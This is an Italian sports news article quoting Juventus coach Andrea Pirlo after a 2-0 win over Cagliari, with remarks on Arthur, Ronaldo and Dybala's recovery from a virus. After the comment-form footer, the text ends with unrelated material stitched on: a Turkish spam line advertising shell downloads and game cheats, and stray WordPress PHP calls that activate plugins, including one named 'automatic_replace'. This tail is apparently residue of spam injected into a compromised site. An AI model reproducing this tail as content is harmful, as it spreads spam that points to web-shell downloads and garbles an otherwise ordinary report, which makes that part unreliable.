Pirlo dopo Juve-Cagliari: “Bravi, spirito giusto”


Il tecnico bianconero “aspetta” Dybala: “Ha avuto qualche problema di salute, quando starà bene tornerà a fare la seconda punta”

Andrea Pirlo è visibilmente soddisfatto dopo il 2-0 al Cagliari. “Era importante per la nostra crescita fare una partita del genere – dice il tecnico bianconero ai microfoni di Dazn -. Gli interpreti possono cambiare ma il nostro modo di giocare deve rimanere lo stesso. Rientravano tanti giocatori dopo la sosta per le nazionali, siamo stati bravi fin dal primo minuto a dominare la partita”.

L’importanza di Arthur

—  

Pirlo poi analizza la prova dei suoi bianconeri: “Abbiamo tanti giocatori bravi a ‘strappare’, spesso il problema è ritrovare compattezza in fase di recupero. Abbiamo tanta qualità ma non basta, se vogliamo dominare le partite dobbiamo giocare a due tocchi e muovere la palla. Col possesso ci divertiamo, corriamo di meno, gestiamo la gara e cresciamo a livello di sicurezza. Arthur? Veniva da un campionato diverso, per le nostre ‘uscite’ è importante. E quando hai un campione come Ronaldo puoi raggiungere ogni risultato, è un esempio per tutti e deve solo continuare così”.

Dybala

—  

Chiusura su Dybala, entrato nella ripresa: “È una seconda punta e lo inseriremo nel suo ruolo ideale quando starà meglio. Ha preso qualche antibiotico per un vecchio virus, ma quando l’ho messo in campo è entrato nel modo giusto”.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Shell İndir Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );